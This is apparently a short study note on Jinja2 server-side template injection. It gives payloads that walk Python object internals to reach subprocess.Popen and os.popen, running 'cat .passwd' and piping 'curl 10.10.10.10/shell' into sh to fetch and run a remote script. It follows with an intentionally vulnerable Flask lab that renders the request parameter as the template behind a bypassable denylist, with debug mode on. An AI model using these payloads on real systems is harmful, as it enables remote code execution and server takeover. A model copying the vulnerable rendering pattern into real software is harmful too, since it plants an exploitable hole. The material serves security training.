SSTI
Todo
```jinja
{{''.__class__.__mro__[1].__subclasses__()}}
```
We need to find `subprocess.Popen` in the returned list of subclasses.
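```jinja
{{''.__class__.__mro__[1].__subclasses__()[250:]}}
{{''.__class__.__mro__[1].__subclasses__()[408]("cat+.passwd",shell=True,stdout=-1).communicate()[0].strip()}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl+10.10.10.10/shell|sh')}}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
```
Every payload above depends on the application compiling request data as template source; the attribute chains they share (`__class__`, `__mro__`, `__subclasses__`, `__globals__`) are also practical strings to alert on in request logs and WAF rules.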
```jinja
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}
```

Basic Lab
from flask import Flask, request, render_template_string
# Flask application object for the lab; the single route below registers on it.
app = Flask(__name__)

# Substring denylist checked by index() against the raw ``cmd`` value.
# The check is a plain, case-sensitive ``in`` test per entry. It is the lab's
# obstacle, not a defence: it does not change the fact that the request value
# is compiled as a template.
blacklist = [
    # template delimiters and punctuation
    '.', '}}', '*', '[', ']', "'", '{{', '_', '+', '/', '-', '<', '>',
    # identifiers
    'self', 'globals', 'builtins', 'import', 'init', 'class', 'mro',
    'getitem', 'config', 'base', 'safe',
]
@app.route('/')
def index():
    """Render the ``cmd`` query parameter as a Jinja2 template.

    Intentionally vulnerable lab endpoint: the request value is used as the
    template *source*, so any expression it contains is evaluated
    server-side (SSTI). The denylist only rejects requests that contain one
    of the listed substrings; it does not make the sink safe.

    The non-vulnerable pattern keeps the template constant and passes user
    data as a context variable, e.g.
    ``render_template_string("{{ value }}", value=param)``.

    Returns:
        The fixed page ``"Error"`` when a denylisted substring is present,
        otherwise the result of rendering the user-supplied template.
    """
    user_template = request.args.get('cmd', '')
    error = None

    for token in blacklist:
        if token in user_template:
            # The message is assigned but never shown: the response is the
            # fixed string "Error".
            error = "L'utilisation de certains mots n'est pas autorisée."
            return render_template_string("Error")

    # Vulnerable sink: untrusted input becomes the template itself.
    return render_template_string(user_template, error=error)
# Script entry point: start Flask's development server.
# NOTE(review): debug=True turns on the Werkzeug interactive debugger and
# reloader. Together with the deliberately vulnerable route above, run this
# only on an isolated lab machine, never on a reachable interface.
if __name__ == "__main__":
    app.run(debug=True)
References